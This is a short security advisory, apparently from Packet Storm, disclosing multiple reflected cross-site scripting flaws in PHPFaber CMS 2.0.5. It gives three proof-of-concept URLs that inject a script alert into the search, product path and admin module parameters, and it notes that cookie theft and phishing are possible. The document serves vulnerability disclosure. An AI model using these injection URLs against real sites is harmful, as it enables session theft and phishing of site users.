PHPFaber CMS version 2.0.5 suffers from multiple cross site scripting vulnerabilities.
83bb2aab6bcbffec7c5f8d3763597641f443f864b3c95238995aa5c66ac17875############################
############################
# Author: prodigy
# Date found: 4/07/2010
############################
###############################
# Software: PHPFaber Content Management System
# Vendor: www.phpfaber.com
# version: 2.0.5
# Vulnerability founded: Multiple XSS Vulnerabilities
# Risk: Medium
# Impact: Malicious attackers can run javascript code into the page to perform phising attacks and cookie stealing.
################################
##################################
PoC
##################################
http://server/cms/module.php?mod=Search&query=%3Cscript%3Ealert%280%29%3C/script%3E&stype=OR&go=++++Go!++++
http://server/cms/module.php/Products/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
http://server/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup
And more...
################################
Greetz: thanks myself for find the bug
################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed